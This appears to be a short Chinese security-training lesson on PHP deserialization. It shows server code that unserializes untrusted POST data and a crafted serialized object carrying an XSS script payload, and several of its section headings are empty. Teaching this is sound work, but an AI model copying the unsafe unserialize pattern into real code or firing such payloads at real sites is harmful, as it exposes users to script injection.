序列化漏洞一

程序输出位置(审查元素查看)
序列化代码简介:
序列化成字符串后代码简介:
反序列化代码简介:
接收端PHP源码如下:
if (isset($_POST['serialize'])) {
    $s = unserialize($_POST['serialize']);
    echo $s->name;
}
我们需要构建漏洞利用代码如下:
# 此代码是类序列化的结果,如 age=20;name="<script>alert('xss')</script>"; 序列化后是:
我们提交以下代码,将会执行XSS
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:29:"<script>alert('xss')</script>";}

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)